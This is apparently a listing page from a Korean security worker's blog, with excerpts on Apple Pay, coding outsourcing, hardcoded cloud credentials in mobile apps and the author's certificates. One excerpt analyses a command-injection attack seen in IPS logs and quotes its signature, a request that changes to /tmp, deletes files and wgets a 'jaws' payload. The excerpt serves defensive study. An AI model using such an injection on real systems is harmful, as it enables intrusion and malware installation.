분류 전체보기35 애플페이가 들어온다? 현재 사용하는 폰도 아이폰, 맥북, 애플워치7, 에어팟프로 말 그래도 애플에 대한 앱등이가 되어버린 사람입니다.ㅎㅎ (너무 다 비싸~~) 애플페이에 대한 말은 삼성페이가 처음 도입되면서 가능하다고 했으나, 카드사에 수수료 때문에 절때 안된다고 하여서 아예 기대도 안했는데, 이번에 삼성카드에서 애플페이로 들어온다고 합니다!! (드디어!) 휴대폰과 이제 지갑을 같이 갖고 다닐 필요가 전혀 사라지는 인생인가~ 운전면허증도 요즘은 모바일로 다 되더라구요. 신분증 대용 가능 애플 서비스 약관 참조 애플 지갑이 이제 생겼으며, IOS 16 업데이트에서 지갑 사용이 가능하게 되었습니다. NFC(근거리 무선 통신)으로 결제가 되는 방식이며, 현대카드로 가능(현재 사용중이지롱~) 코스트코, CU편의점에서 먼저 서비스를 .. 2022. 9. 15. 인력이 부족해 인기 높아지는 코딩 작업 외주화, 장점과 단점 개발자의 인력이 부족해진다는 뉴스가 최근 들어 많이 보인다. 내가 일하는 분야도 개발자는 아니지만, IT 직종에서 워낙 연봉도 높고 개발자 찾기가 하늘의 별따기라는 말이 많다. 주변에 봐도 그러니.. 오죽할까 생각은 한다. 현재 보안쪽을 공부하지만 개발은 기본은 다 해야 한다고 생각한다. 모든 공격 방식에 끝은 개발로 코딩된 쉘 파일이나, 소스 분석이 무조건 필요하다. 뉴스 좀 참조하면서 다시 공부에 대한 일깨움을 배운다. 뉴스 보고 공부하자~ 능력 있는 개발자 찾기가 하늘의 별따기 만큼 어려운 때다. 다행히라면 컴퓨터 코딩은 국제적으로 통합된 언어라는 것이다. 즉 언어나 문화의 장벽이라는 게 크게 작용하지 않는다는 것으로, 시선을 나라 밖으로 돌리는 게 대단히 큰 결심을 요하지 않는다. 하지만 장점과 .. 2022. 9. 12. 안드로이드와 iOS 앱 수천 개에서 발견된 AWS 크리덴셜들 보안뉴스 22. 9. 6.(화) 크리덴셜이란 : 출입보안에서 자격증명이라는 출입할 수 있는 자격과 그 자격을 증명하는 구체적인 것으로, 자격을 증명하는 구체적인 수단을 의미한다. * 하드코딩된 크리덴셜이란 개발자들이 시간을 절약하기 위해 종종 자격증명과 비밀번호를 코딩하여 사용 하드코딩된 크리덴셜을 사용하는 이유 1) 대규모 미디어 파일을 클라우드로부터 업로드/다운로드 하기 위해서 2) 인증에 필요한 개별 클라우드 서비스를 활용하기 위해서 3줄 요약 1. 2000개 가까운 모바일 앱들에서 하드코딩 된 클라우드 크리덴셜 발견됨. 2. 개발 과정 중에 클라우드와 연동되는 기능이 많이 구현되어야 해서 나타나는 현상. 3. 이 크리덴셜들 추출하면 기업들의 비밀 클라우드와 여러 파일들에 접근할 수 있음. 참고 :.. 2022. 9. 6. Commandline Injection Attack (명령어 삽입 공격) 22. 9. 5. 밤에 쓰는 이야기 최근 IPS에서 들어오는 취약점 공격으로 Snort 룰 : GET /shell cd/tmp rm -rf wget 0.0.0.0/jaws 공격이 많이 들어오고 있다. 해당 내용 분석결과 wget 커맨드 라인에 대한 공격으로 1. 시스템 명령어를 호출하는 어플리케이션의 인자 값을 조작하여 의도하지 않은 시스템 명령어를 실행시키는 공격 기법 2. 취약한 어플리케이션을 통하여 사용자의 명령어 시스템에서 임의적인 명령을 실행시키는 것을 목적으로 하는 공격 으로 설명이 될 수 있다. tmp 파일은 임시 파일로 현재 위에 공격방법은 tmp 디렉토리에 접근하여 악성 스크립트를 삽입하려는 시도로 매우 강하게 보인다. wget은 리눅스에서 파일을 다운받는 명령어로 wget [옵션]..... 2022. 9. 5. 현재 가지고 있는 자격증 및 공부 학점은행제 - 컴퓨터 공학과 졸업 현재 - 아주대학교 정보통신대학원 사이버보안학과 재학(3학기 진행중) 개발은 소스만 살짝 볼 수 있을정도의 보안관제 6년차 서버 관련 업무, 정보보호장비 관련 침입 탐지 및 초동조치 등 데이터센터 근무 1. 정보처리기능사 (2015.11.26.) 2. 정보처리산업기사 (2016.07.15.) 3. 정보처리기사 (2018.08.17.) 4. 네트워크관리사 2급 NT2040337 (유효기간 : 2017.12.12 ~ 2022.12.11) 5. 컴퓨터활용능력 1급 (2019.08.16.) 6. 정보기기운용기능사 (2016.07.27.) 7. 워드프로세스 3급 (2007.03.16.) 8. 정보보안산업기사 (2022.09.08) 9. 정보보안진단원 (ISD_C_20_0123, .. 2022. 8. 26. 이전 1 ··· 3 4 5 6 다음
